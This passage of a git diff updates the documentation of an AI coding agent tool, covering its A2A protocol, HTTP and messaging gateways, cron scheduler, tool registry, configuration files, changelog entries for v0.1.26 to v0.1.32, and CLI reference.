-vendor adapter defaults before constructing the generic OpenAI-compatible or
-Anthropic-compatible protocol provider.
+Provider is an abstraction layer for interacting with LLM APIs. All running modes
+use `internal/provider/factory` for provider creation, which applies vendor adapter
+defaults before constructing the generic OpenAI-compatible or Anthropic-compatible
+protocol provider.
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -91,7 +136,9 @@ type StreamEvent struct {
 
 ### 2. Agent Loop
 
-Agent is the core logic that coordinates Provider, Tools, and Session.
+Agent is the core logic that coordinates Provider, Tools, and Session. All running
+modes reuse the same Agent loop — the difference is only the input source (terminal,
+HTTP, messaging, A2A, stdio) and output target.
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -109,7 +156,7 @@ Agent is the core logic that coordinates Provider, Tools, and Session.
 #### Execution Flow
 
 ```
-User Input
+User Input (TUI / HTTP / Messaging / A2A / ACP stdio)
     │
     ▼
 ┌───────────────┐
@@ -156,16 +203,175 @@ Main Agent
 Child agents cannot create nested sub-agents because their registries filter out
 the `subagent_*` tools.
 
-### 4. Cron Scheduler
+### 4. A2A Protocol
+
+The A2A (Agent-to-Agent) protocol enables different AI agents to discover,
+communicate, and collaborate with each other.
+
+```
+┌───────────────────────────────────────────────────────────────────┐
+│                     A2A Protocol Architecture                      │
+├───────────────────────────────────────────────────────────────────┤
+│                                                                   │
+│  ┌──────────────────┐          ┌──────────────────┐              │
+│  │   A2A Server     │          │   A2A Client     │              │
+│  │  (vibecoding)    │ ◄──────► │  (any agent)     │              │
+│  │                  │  JSON-RPC │                  │              │
+│  │  /a2a            │  2.0     │  SendMessage()   │              │
+│  │  /a2a/send       │  + SSE   │  GetTask()       │              │
+│  │  /a2a/task       │          │  CancelTask()    │              │
+│  │  /a2a/events     │          │  GetAgentCard()  │              │
+│  └──────────────────┘          └──────────────────┘              │
+│                                                                   │
+│  Task lifecycle: submitted → working → completed/failed/canceled   │
+│                                                                   │
+│  Two running modes:                                               │
+│  • Standalone: vibecoding a2a start (port 8093)                   │
+│  • Integrated: hermes.json a2a.enabled: true (shared port 8090)   │
+│                                                                   │
+└───────────────────────────────────────────────────────────────────┘
+```
+
+#### A2A Master Mode
+
+A2A Master mode is enabled via `--enable-a2a-master`. It loads a remote agent
+list from `a2a-list.json` and registers an `a2a_dispatch` tool for the LLM
+to automatically dispatch tasks.
+
+```
+┌───────────────────────────────────────────────────────────────┐
+│                   A2A Master Mode                              │
+├───────────────────────────────────────────────────────────────┤
+│                                                               │
+│  a2a-list.json                                                │
+│  ┌─────────────────────────────────────────┐                  │
+│  │ agents:                                 │                  │
+│  │   - name: code-reviewer                 │                  │
+│  │     url: http://review:8093             │                  │
+│  │   - name: ci-agent                      │                  │
+│  │     url: http://ci:8093                 │                  │
+│  └─────────────────────────────────────────┘                  │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐                                         │
+│  │   A2AManager     │ ← loads agent list                      │
+│  └────────┬─────────┘                                         │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐                                         │
+│  │  a2a_dispatch    │ ← registered as LLM tool                │
+│  │  (agent_name,    │                                         │
+│  │   message)       │                                         │
+│  └────────┬─────────┘                                         │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐  ┌──────────────────┐                  │
+│  │  code-reviewer   │  │  ci-agent        │                  │
+│  │  http://review   │  │  http://ci       │                  │
+│  │  :8093           │  │  :8093           │                  │
+│  └──────────────────┘  └──────────────────┘                  │
+│                                                               │
+└───────────────────────────────────────────────────────────────┘
+```
+
+### 5. Gateway Mode
+
+`internal/gateway/` implements an OpenAI-compatible HTTP gateway exposing the
+standard Chat Completions API.
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Gateway Architecture                       │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  OpenAI-compatible clients (curl, SDK, any tool)             │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  HTTP Gateway (net/http)                 │               │
+│  │  POST /v1/chat/completions               │               │
+│  └──────────────────────────────────────────┘               │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Agent Loop (shared)                     │               │
+│  │  + Tools + Session + Sandbox + Skills     │               │
+│  └──────────────────────────────────────────┘               │
+│                                                             │
+│  Config: gateway.json (global ~/.vibecoding/ or .vibe/)      │
+│  Security: Bearer token + allowedWorkDirs + sandbox          │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 6. Hermes Messaging Gateway
+
+`internal/hermes/` implements a messaging gateway supporting WeChat, Feishu,
+and WebSocket.
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Hermes Architecture                        │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  ┌──────────┐  ┌──────────┐  ┌──────────┐                  │
+│  │  WeChat   │  │  Feishu   │  │ WebSocket │                  │
+│  └─────┬────┘  └─────┬────┘  └─────┬────┘                  │
+│        │             │             │                         │
+│        └─────────────┼─────────────┘                         │
+│                      ▼                                       │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Hermes Dispatcher                       │               │
+│  │  (per-user session, yolo mode default)   │               │
+│  └──────────────────────────────────────────┘               │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Agent Loop (shared)                     │               │
+│  │  + Tools + Session + Sandbox + Skills     │               │
+│  └──────────────────────────────────────────┘               │
+│                                                             │
+│  Config: hermes.json                                         │
+│  Session: <sessionDir>/hermes/<platform>/<user_id>/          │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 7. Cron Scheduler
 
 The `internal/cron` package provides a file-backed cron store and scheduler that
-can execute jobs through sub-agents. The TUI exposes `/cron` command entry
-points in multi-agent mode; full natural-language parsing and persistent TUI
-management remain follow-up wiring.
+can execute jobs through sub-agents or remote A2A servers. The TUI exposes `/cron`
+command entry points in multi-agent mode.
 
-### 5. Tool System
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Cron Scheduler                             │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  ┌──────────────────┐                                       │
+│  │  CronStore       │ ← cron.json persistence               │
+│  │  (FileCronStore) │                                       │
+│  └────────┬─────────┘                                       │
+│           │                                                 │
+│           ▼                                                 │
+│  ┌──────────────────┐                                       │
+│  │  Scheduler       │ ← periodic polling (default 30s)      │
+│  └────────┬─────────┘                                       │
+│           │                                                 │
+│     ┌─────┴─────┐                                           │
+│     ▼           ▼                                           │
+│  ┌───────┐  ┌───────────┐                                   │
+│  │SubAgent│  │A2A Server │                                   │
+│  │(local) │  │(remote)   │  ← --a2a-target flag              │
+│  └───────┘  └───────────┘                                   │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 8. Tool System
 
-Tools are the way Agent interacts with the external world.
+Tools are the way Agent interacts with the external world. All running modes
+share the same tool registry.
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -184,11 +390,17 @@ Tools are the way Agent interacts with the external world.
 │  File Tools   │   │  Search Tools │   │  System Tools │
 │  - read       │   │  - grep       │   │  - bash       │
 │  - write      │   │  - find       │   │  - ls         │
-│  - edit       │   │               │   │               │
+│  - edit       │   │               │   │  - jobs       │
+└───────────────┘   └───────────────┘   │  - kill       │
+                                        └───────────────┘
+┌───────────────┐   ┌───────────────┐   ┌───────────────┐
+│  Planning     │   │  Skills       │   │  A2A Master   │
+│  - plan       │   │  - skill_ref  │   │  - a2a_       │
+│               │   │               │   │    dispatch   │
 └───────────────┘   └───────────────┘   └───────────────┘
 ```
 
-### 6. Session Management
+### 9. Session Management
 
 Sessions use JSONL format with tree structure and branching support.
 
@@ -231,7 +443,7 @@ Sessions use JSONL format with tree structure and branching support.
 | `compaction` | Context compression record |
 | `label` | Session label |
 
-### 7. Sandbox System
+### 10. Sandbox System
 
 Sandbox implements process isolation through bubblewrap (bwrap).
 
@@ -249,11 +461,11 @@ Sandbox implements process isolation through bubblewrap (bwrap).
         ▼                     ▼                     ▼
 ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
 │  LevelNone    │   │ LevelStandard │   │  LevelStrict  │
-│  (Unrestricted)│  │ (Project R/W) │   │ (Project R/O) │
+│ (Unrestricted)│   │ (Project R/W) │   │ (Project R/O) │
 └───────────────┘   └───────────────┘   └───────────────┘
 ```
 
-### 8. TUI System
+### 11. TUI System
 
 Terminal user interface based on BubbleTea.
 
@@ -282,15 +494,28 @@ Terminal user interface based on BubbleTea.
 └─────────────────────────────────────────────────────────────┘
 ```
 
+## Configuration Files
+
+| File | Location | Purpose |
+|------|----------|---------|
+| `settings.json` | `~/.vibecoding/` or `.vibe/` | Core settings (provider, model, mode, etc.) |
+| `gateway.json` | `~/.vibecoding/` or `.vibe/` | HTTP gateway configuration |
+| `hermes.json` | `~/.vibecoding/` or `.vibe/` | Messaging gateway configuration |
+| `a2a.json` | `~/.vibecoding/` or `.vibe/` | A2A server configuration |
+| `a2a-list.json` | `~/.vibecoding/` or `.vibe/` | A2A Master remote agent list |
+| `mcp.json` | `~/.vibecoding/` or `.vibe/` | MCP server configuration |
+| `memory.md` | project root or `~/.vibecoding/` | Persistent memory |
+| `cron.json` | `~/.vibecoding/` | Cron job persistence |
+
 ## Data Flow
 
 ### Complete Request Flow
 
 ```
-1. User Input
+1. User input (from TUI / HTTP / Messaging / A2A / ACP stdio)
    │
    ▼
-2. TUI captures input
+2. Input layer captures
    │
    ▼
 3. Agent.Run(ctx, input)
@@ -314,7 +539,7 @@ Terminal user interface based on BubbleTea.
 7. SSE streaming response
    ├── TextDelta → Display text
    ├── ThinkingDelta → Display thinking
-   └── ToolCall → Execute tool
+   └── ToolCall → Execute tool (incl. a2a_dispatch)
    │
    ▼
 8. Tool execution (via Sandbox)
@@ -356,3 +581,9 @@ Implement process-level isolation through bubblewrap, protecting system security
 The `agent/` package exposes public Go types (`Agent`, `Provider`, `Builder`) so
 external applications can embed the agent without depending on internal packages.
 See [SDK Integration Guide](sdk.md) for usage details.
+
+### 7. Shared Agent Loop
+
+All running modes (TUI, Gateway, Hermes, A2A, ACP) reuse the same Agent loop.
+The only difference is the input source and output target. This ensures behavioral
+consistency and avoids logic divergence.
diff --git a/docs/en/changelog.md b/docs/en/changelog.md
index 48b241a..96f9fd6 100644
--- a/docs/en/changelog.md
+++ b/docs/en/changelog.md
@@ -1,6 +1,395 @@
 # Changelog
 
 
+## v0.1.32
+
+### ✨ Features
+
+- **Tool System Completeness**
+  - Added full documentation for all registered tools: `jobs`, `kill`, `question`, `memory`, `cron`, and MCP dynamic tools
+  - `jobs` tool: list and inspect background jobs started with `bash async=true`, with optional cleanup
+  - `kill` tool: terminate a running background job by ID
+  - `question` tool: AI can ask users multiple-choice questions during plan mode to clarify requirements
+  - `memory` tool (Hermes): persistent memory via `memory.md` with read/add/update/delete actions across sessions
+  - `cron` tool (Hermes/multi-agent): scheduled background tasks via sub-agents with `@daily`, `@weekly`, `@every N` schedules and one-shot support
+  - MCP dynamic tools: tools/resources/prompts from MCP servers are auto-discovered and registered per session
+
+- **Plan Mode Question Tool**
+  - Added `question` tool, registered only in TUI + plan mode
+  - AI can ask users multiple-choice questions; users select a preset option or type a custom answer
+  - Helps clarify requirements before forming a plan, producing higher-quality proposals
+  - Exposed via `QuestionHandler` optional interface (type assertion); does not pollute the public `Agent` interface
+
+### 🐛 Bug Fixes
+
+- **Bash Tool Output Safety**
+  - Synchronous bash mode now enforces a 1 GB output limit using `limitedBuffer`, preventing OOM from unbounded `bytes.Buffer` growth
+
+- **Hermes `/compact` Command**
+  - Implemented the `/compact` slash command for Hermes messaging mode (previously a TODO stub)
+  - Sets a `ForceCompact` flag on the session, consumed by the next agent run to trigger context compaction
+
+- **Session Durability**
+  - `writeEntry` now calls `f.Sync()` after writing, guaranteeing data survives crash or power loss
+  - Corrupt session lines are now logged as warnings and skipped instead of blocking session load
+
+- **Hermes Approval Race Condition**
+  - `ResolveApproval` now uses `select` to avoid writing to an already-consumed channel when timeout and approval race
+
+- **Agent Sub-agent Panic Logging**
+  - `sendParentEvent` now logs the panic value before recovering, aiding diagnosis of closed-channel races
+
+- **Atomic File Write Cleanup**
+  - `writeFileAtomic` no longer uses `defer os.Remove(tmpPath)` which would attempt to delete an already-renamed file; cleanup is now explicit on each error path
+
+- **Agent Loop Detection Configurability**
+  - `MaxConsecutiveNoText` (stuck-detection threshold) is now configurable via `AgentLoopConfig` (default 95)
+  - Fixed incorrect error message that added pre- and post-warning counters together
+
+- **Job Manager Auto-cleanup**
+  - `AddJob` now garbage-collects finished jobs older than 30 minutes (checked every 5 minutes)
+
+- **Cron Scheduler Error Logging**
+  - `checkAndRun` now logs store errors instead of silently swallowing them
+
+- **TUI Bash Output Display**
+  - Compressed bash tool output summary by removing blank lines to prevent excessive vertical height in the TUI collapsed view
+
+- **Vendored Search Tools**
+  - Added fallback to system `grep` / `find` when embedded `rg` / `fd` are unavailable for the current architecture
+
+### 📦 Distribution
+
+- Added Linux LoongArch64 (`loong64`) build and packaging targets, including tarball, Debian, and npm package metadata
+
+### ✅ Tests
+
+- Added unit tests for `limitedBuffer` truncation, `JobManager` GC, `writeFileAtomic` cleanup, `sendParentEvent` panic recovery, `MaxConsecutiveNoText` configurability, session fsync durability, corrupt-line tolerance, and `QuestionTool` metadata/mode-filtering/execution/error-handling
+
+
+## v0.1.31
+
+### 🐛 Bug Fixes
+
+- **Terminal Input**
+  - Added Home/End cursor movement support in the TUI input box
+  - Fixed the first submitted input being swallowed after canceling an approval prompt with Esc
+  - Added command history navigation with Up/Down, including repeated selection through previous inputs
+
+- **A2A Security and Reliability**
+  - Changed the default A2A host from `0.0.0.0` to `127.0.0.1`
+  - Added Bearer token authentication for `/a2a`, REST A2A routes, and SSE events while keeping the Agent Card public
+  - Replaced timestamp-based A2A task IDs with collision-resistant random IDs
+  - Made A2A task store reads and writes use cloned task snapshots to avoid accidental shared mutation
+
+- **Path and Session Safety**
+  - Fixed path containment checks to use path-aware boundaries instead of string prefix checks
+  - Prevented context `extraFiles` from escaping the working directory
+  - Encoded unsafe Hermes session path components and enforced `allowed_work_dirs` during session creation
+  - Restricted session deletion to `.jsonl` files under the configured session directory
+
+- **Auth, Approval, and Resource Limits**
+  - Switched Hermes HTTP/WebSocket token checks to constant-time comparison
+  - Changed the Hermes WebSocket client to send auth via `Authorization: Bearer ...` instead of query strings
+  - Cleaned up pending ACP permission requests on timeout and propagated ACP write errors
+  - Added request/body size limits for ACP, read-tool image files, WeChat responses, and cron A2A responses
+  - Added timeouts to cron A2A HTTP calls
+
+- **Memory, Context, and Concurrency**
+  - Added locking to memory store operations
+  - Fixed `memory.WriteAll()` path handling and kept memory update/delete scoped to the requested section
+  - Cloned gateway model settings before per-request `temperature`/`top_p` overrides
+  - Passed agent callback context/message snapshots instead of shared references
+  - Serialized cron job state transitions through the job store
+
+- **Configuration and Gateway Hardening**
+  - Gated `!command` API key resolution behind `VIBECODING_ALLOW_SHELL_CONFIG=1`
+  - Fixed Gateway CORS to echo only the allowed request origin
+  - Added a startup warning when Gateway listens beyond loopback in `yolo` mode without authentication
+  - Hardened platform home/shell fallback behavior
+
+### 🧪 Tests
+
+- Added regression coverage for A2A auth, task ID uniqueness, task snapshot isolation, and persisted working task messages
+- Added coverage for path traversal, unsafe session IDs, memory section operations, ACP cleanup, CORS behavior, UTF-8 truncation, and shell-config opt-in
+- Ran focused package tests plus race tests for A2A, agent, gateway, and cron
+
+### 📝 Docs
+
+- Updated A2A, Hermes, Gateway, configuration, and security docs for the new authentication and hardening behavior
+
+## v0.1.30
+
+### ✨ Features
+
+- **Per-Provider HTTP Proxy**
+  - Added `providers.<name>.httpProxy` to route individual providers through different HTTP proxies
+  - Kept default environment proxy behavior when a provider does not set `httpProxy`
+
+- **Google Gemini and Vertex Vendor Adapters**
+  - Added native `google-gemini` and `google-vertex` providers using Google `streamGenerateContent`
+  - Enabled base URL detection for Gemini API and Vertex AI native Gemini endpoints
+  - Added default Google provider templates for Gemini API keys and Vertex bearer tokens
+  - Updated provider documentation and lookup coverage for Google vendor names
+
+- **Hosted Web Search Tool**
+  - Added `--web-search` for CLI and ACP runs
+  - Added top-level `webSearch` settings with `enabled`, `provider`, `providerType`, and `model`
+  - Registered hosted `web_search` tools only when enabled, keeping them separate from local function tools
+  - Added OpenAI Responses API mapping to `web_search`
+  - Updated Responses web search mapping to provider-neutral `web_search`, so compatible custom providers are not required to be named `openai`
+  - Added Anthropic Messages API mapping to `web_search_20250305`
+  - Preserved `webSearch.model` as provider-neutral metadata for future routing and cost display
+
+- **Default Provider Templates**
+  - Added built-in default provider entries for OpenAI, Anthropic, and Xiaomi MiMo
+  - Kept DeepSeek providers and `deepseek-openai` as the default provider/model
+  - First-run `settings.json` now includes disabled web search configuration plus OpenAI/Anthropic/Xiaomi provider templates
+
+### 🧪 Tests
+
+- Added coverage for hosted web search tool serialization across OpenAI Responses and Anthropic Messages
+- Added coverage for web search configuration defaults, CLI flag parsing, and hosted tool metadata propagation
+- Added coverage for macOS default config directory resolution
+
+### 🐛 Bug Fixes
+
+- **macOS Config Directory**
+  - Unified the default macOS global config directory with Linux at `~/.vibecoding`
+
+- **Release Versioning**
+  - Removed the default `dirty` suffix from npm and distribution package version detection
+  - Normalized npm package metadata to `0.1.30`
+
+## v0.1.29
+
+### 🐛 Bug Fixes
+
+- **NPM Package Wrapper**
+  - Fixed `npm/bin/vibecoding` entry script to ensure installer packages ship the correct executable wrapper
+  - Adjusted `build-npm.sh` and `build-npm-packages.sh` to include the wrapper consistently
+
+## v0.1.28
+
+### ✨ Features
+
+- **Per-Model Temperature/Top-P Configuration**
+  - Added `temperature` and `top_p` fields to `ModelConfig` and `Model` for per-model parameter tuning
+  - Wired through OpenAI and Anthropic providers with `omitempty` — `nil` means use API default
+  - Wired through provider factory, agent loop, and ACP mode
+  - Gateway supports per-request `temperature`/`top_p` override via `ChatParams`
+  - When not configured, parameters are omitted entirely (no zero-value sent to API)
+
+- **OpenAI Responses API Support**
+  - Added a dedicated OpenAI Responses provider path under `api: "openai-responses"`
+  - Supports Responses streaming, tool calls, reasoning summaries, and prompt cache parameters
+  - Responses configuration is exposed under provider `responses` settings with default prompt cache enabled
+  - Added model compat flags for `supportsPromptCacheKey` and `supportsReasoningSummary`
+
+### 🧪 Tests
+
+- Improved provider test coverage for OpenAI Responses API and Anthropic request parsing
+- Reworked Anthropic tests to use in-memory HTTP mocks instead of port-binding test servers
+
+### 📝 Docs
+
+- Updated `AGENTS.md` version to v0.1.28
+
+## v0.1.27
+
+### ✨ Features
+
+- **Hermes Mode** (`vibecoding hermes`)
+  - New messaging gateway mode for WeChat, Feishu, and WebSocket
+  - Persistent per-user sessions with auto-archiving on `/new`
+  - Default `yolo` mode for unattended operation
+  - Smart approvals with tiered risk classification (low/medium/high)
+  - User whitelist for platform access control
+  - WebSocket streaming: real-time text_delta/think_delta/tool_call/tool_result/tool_diff/usage/done events
+
+- **A2A Protocol** (`vibecoding a2a`)
+  - New Agent-to-Agent protocol server (JSON-RPC 2.0 over HTTP + SSE streaming)
+  - Standalone mode: `vibecoding a2a start` (port 8093)
+  - Integration mode: `hermes.json` `a2a.enabled: true` shares hermes HTTP port
+  - Agent Card at `/.well-known/agent.json`
+  - Task lifecycle: submitted → working → completed/failed/canceled
+  - REST endpoints: `/a2a/send`, `/a2a/task`, `/a2a/task/cancel`, `/a2a/events`
+  - **A2A Client**: `vibecoding a2a send <message>` to send tasks to other A2A servers
+  - **A2A Discovery**: `vibecoding a2a discover <url>` to fetch remote Agent Cards
+  - **A2A Scheduling**: Cron jobs support `--a2a-target` to schedule tasks to A2A servers
+
+- **A2A Master Mode** (`--enable-a2a-master`)
+  - Configure multiple remote A2A agents via `a2a-list.json`
+  - Registers `a2a_dispatch` tool for the LLM to automatically dispatch tasks to remote agents
+  - Supports global (`~/.vibecoding/a2a-list.json`) and project-level (`.vibe/a2a-list.json`) config
+  - `--init-a2a-master-config` generates a sample config file
+  - Disabled by default, requires explicit opt-in
+
+- **A2A Config Initialization**
+  - `vibecoding a2a --init-a2a-config` generates `a2a.json` config template
+  - `vibecoding --init-gateway` generates `gateway.json` config template (existing)
+  - `vibecoding --init-a2a-master-config` generates `a2a-list.json` config template
+  - All `--init-*` flags support `--force` to overwrite existing files
+
+- **Scenarios & Walkthroughs Documentation**
+  - New `docs/scenarios.md` (zh + en) covering 9 practical usage scenarios
+  - Covers: daily coding, CI integration, multi-agent, VS Code ACP, A2A server,
+    A2A Master cross-machine dispatch, Gateway HTTP, Hermes messaging, combined modes
+
+- **Documentation Overhaul**
+  - `architecture.md`: added all missing modules (a2a/acp/gateway/hermes/mcp/memory/messaging/vendored)
+  - `tools.md`: added `a2a_dispatch` and `skill_ref` tool docs
+  - `cli-reference.md`: added `--enable-a2a-master`, `--init-a2a-master-config`,
+    `--init-gateway`, `--force`, `a2a` subcommand docs
+  - `README.md`: updated architecture diagram, added running modes overview
+
+- **Pressure System**
+  - Context Pressure: `EventContextPressure` fired at 55% context usage (configurable via `context_pressure_threshold`)
+  - Budget Pressure: `EventBudgetPressure` fired at 20% remaining iterations (configurable via `budget_pressure_threshold`)
+  - One-shot events: fire once per threshold crossing, not every turn
+  - Messaging platforms receive pressure warnings via progress callback
+
+- **Smart Approvals (Tiered Strategy)**
+  - Low risk: auto-approve
+  - Medium risk: auto-approve + notify user
+  - High risk (WebSocket): send `approval_request`, wait for user `approval_response` (5min timeout)
+  - High risk (messaging): auto-reject + notify user
+  - Command risk classification: low/medium/high based on bash command patterns
+
+- **Provider/Model Configuration**
+  - `default_provider` / `default_model` in `hermes.json` (overrides `settings.json`)
+  - CLI flags `-p`/`--provider` and `-m`/`--model` for `hermes start`
+  - Priority: CLI flags > `hermes.json` > `settings.json`
+
+- **Multi-Agent Mode** (`--multi-agent`)
+  - Enables sub-agent tools (spawn/status/send/destroy) in hermes sessions
+  - Configurable via `hermes.json` `multi_agent` field or `--multi-agent` CLI flag
+
+- **Sandbox Mode** (`--sandbox`)
+  - Optional bwrap sandbox isolation (disabled by default)
+  - Configurable via `hermes.json` `sandbox` field or `--sandbox` CLI flag
+
+- **MCP Integration**
+  - Hermes automatically loads MCP servers from global/project `mcp.json`
+  - MCP tools registered per-session, connections auto-closed on session removal
+
+- **Progress Events for Messaging Platforms**
+  - Real-time tool execution progress sent to WeChat/Feishu during agent runs
+  - Format: `[tool]: args ✅/❌` for tools, `💭 ...` for thinking process
+  - Final summary sent after agent completes
+
+- **Memory Tool**
+  - `memory` tool with read/add/update/delete actions
+  - Section-level operations (User Profile, Working Memory, Lessons Learned)
+  - Defaults to `.vibe/memory.md` (project directory)
+  - Lookup priority: `memory.path` config → `.vibe/memory.md` → `<GLOBAL_DIR>/memory.md`
+  - `/api/memory` HTTP endpoint (GET/PUT) for memory access
+
+- **Hermes CLI Commands**
+  - `hermes start` — start daemon with all CLI flags
+  - `hermes stop` — stop daemon via PID file + SIGTERM
+  - `hermes status` — check daemon status via PID + HTTP health
+  - `hermes client` — WebSocket client with streaming output and slash commands
+  - `hermes config init/show` — configuration management
+  - `hermes wechat login/status` — WeChat iLink management
+  - `hermes feishu setup/status` — Feishu configuration
+  - `hermes webhook list` — webhook route listing
+  - `hermes memory show/clear` — memory management
+  - `hermes sessions list` — active session listing (queries running instance)
+  - `hermes cron list/add/remove/enable/disable` — cron job management
+  - `a2a start/stop/status/card` — A2A server management
+
+### 📝 Changes
+
+- WeChat iLink implementation with zero external dependencies (5 files: types/protocol/auth/crypto/wechat)
+- Feishu bot with official SDK and WebSocket long-connection
+- Shell hooks for pre/post tool call external scripts (JSON stdin/stdout)
+- Webhook inbound routing with HMAC-SHA256 signature verification
+- WebSocket uses `golang.org/x/net/websocket` (stdlib compatible)
+- PID file-based daemon management for hermes stop/status
+
+### 🐛 Bug Fixes
+
+- **NPM Installer Packaging**
+  - Fixed release packaging flow so `vibecoding-installer` always ships executable entry `bin/vibecoding`.
+  - Added `scripts/npm-installer-wrapper.js` as the single source of wrapper logic, reused by both
+    `scripts/build-npm.sh` and `scripts/build-npm-packages.sh` to avoid drift.
+  - Adjusted `npm/.npmignore` and `npm/bin` handling to avoid shipping accidental build artifacts and to keep
+    package manifests (`files`) explicit.
+
+- **Hermes Webhook Delivery and Filtering**
+  - Webhook routes now treat unknown event types as non-matching unless the route explicitly allows `*`.
+  - Added `delivery_target` to webhook routes so WeChat/Feishu delivery has a concrete recipient.
+  - Updated webhook route listing and config templates to show the delivery target when present.
+
+- **OpenAI Responses Thinking Mapping**
+  - Mapped `--thinking xhigh` to `reasoning.effort: "high"` for the OpenAI Responses API.
+
+### 🧪 Tests
+
+- Reworked webhook router tests to wait on handler completion instead of sleeping, removing a race/flakiness source.
+- Added coverage for webhook event rejection when the event type cannot be inferred.
+- Added coverage for webhook delivery target handling.
+
+## v0.1.26
+
+### ✨ Features
+
+- **Gateway Mode** (`vibecoding gateway`)
+  - New HTTP server exposing a standard OpenAI Chat Completions API (`/v1/chat/completions`, `/v1/models`, `/health`)
+  - Any OpenAI-compatible client (Cursor, Continue, Open WebUI, Python SDK, etc.) can connect directly
+  - Streaming (SSE) and non-streaming responses fully supported
+  - Backend powered by VibeCoding agent loop with tool execution transparent to the caller
+
+- **Multi-Session Support**
+  - Built-in `SessionPool` for concurrent sessions, each with isolated agent, tools, and message history
+  - Session association via `x_session_id` in request body; auto-created when absent
+  - Configurable idle timeout (`session.idleTimeoutSeconds`) and max session limit (`session.maxSessions`)
+
+- **Sub-Agent Support in Gateway**
+  - Optional `enableSubAgents` config to enable multi-agent orchestration in gateway mode
+  - Reuses existing `AgentFactory` / `AgentManager` / sub-agent tools with no core agent changes
+
+- **Bearer Token Authentication**
+  - Configurable via `gateway.json` with `auth.enabled` and `auth.tokens` list
+  - Disabled by default; `/health` endpoint always unauthenticated
+
+- **Slash Commands via API**
+  - `/clear`, `/mode`, `/model`, `/models`, `/sessions`, `/compact`, `/status`, `/skill`, `/skills`, `/help`
+  - Triggered when the last user message starts with `/`; processed at gateway layer without invoking LLM
+  - Responses use standard OpenAI format with `x_command` extension field
+
+- **Tool Visibility Configuration** (`toolVisibility.mode`)
+  - `"content"` (default): tool status sent as text in `content` field during streaming
+  - `"sse_event"`: tool status sent as extended SSE events for custom clients
+  - `"none"`: fully transparent, client sees only final text
+
+- **System Prompt Handling** (`systemPromptMode`)
+  - `"append"` (default): client system messages appended to built-in system prompt
+  - `"ignore"`: client system messages discarded entirely
+
+- **Security: allowedWorkDirs**
+  - Directory whitelist for `x_working_dir` request-level overrides with path-separator-aware prefix matching
+  - Three-layer security model: L1 auth + L2 directory control + L3 sandbox (bwrap)
+
+- **Sandbox Support in Gateway**
+  - Configurable via `gateway.json` `sandbox.enabled` / `sandbox.level` or `--sandbox` flag
+  - Inherits detailed sandbox settings (allowedRead, deniedPaths, etc.) from `settings.json`
+
+- **Gateway Configuration** (`gateway.json`)
+  - Independent config file at `~/.vibecoding/gateway.json`
+  - Covers: listen address, auth, mode, sandbox, workingDir, allowedWorkDirs, session management, CORS, tool visibility, system prompt mode, request timeout, concurrency limit, logging
+  - `vibecoding --init-gateway` to generate template; `--force` to overwrite
+
+- **Request Timeout & Concurrency**
+  - `requestTimeoutSeconds` (default 1800s); streaming keeps alive as long as data flows
+  - `maxConcurrentRequests` (default 0 = unlimited)
+
+### 📝 Docs
+
+- Added `docs/gateway-proposal.md` with full architecture, API design, security model, and implementation plan
+- Updated `AGENTS.md` version note
+
 ## v0.1.25
 
 ### ✨ Features
@@ -76,7 +465,7 @@
   - Added missing settings: `cacheControl`, idle compression, full sandbox fields (`bwrapPath`, `allowedRead`, `allowedWrite`, `deniedPaths`, `passEnv`, `tmpSize`), `shellPath`, `shellCommandPrefix`, `sessionDir`, `skillsDir`, `theme`, `retry`
   - Documented shell command `apiKey` format (`!cmd`) for password manager integration
   - Fixed key resolution order: config `apiKey` first, then derived env var
-  - Fixed macOS config path: `~/Library/Application Support/vibecoding/`
+  - Updated macOS config path documentation
   - Added top-level fields reference table with all defaults
   - Added per-platform defaults for sandbox paths and env vars
   - Improved examples with Claude provider `cacheControl`, idle compression, project-level overrides, and custom sandbox paths
@@ -896,4 +1285,4 @@
 
 ---
 
-**Full Changelog**: https://github.com/startvibecoding/vibecoding/compare/v0.0.1...v0.0.7
+**Full Changelog**: https://github.com/startvibecoding/vibecoding/compare/v0.1.26...v0.1.27
diff --git a/docs/en/cli-reference.md b/docs/en/cli-reference.md
index a458550..88907ac 100644
--- a/docs/en/cli-reference.md
+++ b/docs/en/cli-reference.md
@@ -47,6 +47,10 @@ Alias: `vc`
 
 | Parameter | Short | Description |
 |-----------|-------|-------------|
+| `--init-gateway` | - | Create `gateway.json` config template |
+| `--init-a2a-master-config` | - | Create `a2a-list.json` config template |
+| `--enable-a2a-master` | - | Enable A2A master mode (remote agent dispatch) |
+| `--force` | - | Force overwrite existing files (used with `--init-*`) |
 | `--version` | `-v` | Show version |
 | `--help` | `-h` | Show help |
 
@@ -75,6 +79,27 @@ Supports VS Code, JetBrains IDEs, and any ACP-compatible editor.
 
 See the [ACP Protocol](acp.md) documentation for IDE integration details.
 
+### `a2a` - A2A Protocol Server
+
+Run the A2A (Agent-to-Agent) protocol server, supporting standalone and integrated modes.
+
+```
+vibecoding a2a [command]
+```
+
+| Subcommand | Description |
+|------------|-------------|
+| `start` | Start A2A server |
+| `stop` | Stop A2A server |
+| `status` | Show server status |
+| `card` | Show/generate Agent Card |
+| `send <message>` | Send task to remote A2A server |
+| `discover <url>` | Discover remote Agent Card |
+| `--init-a2a-config` | Create `a2a.json` config template |
+| `--force` | Force overwrite existing config file |
+
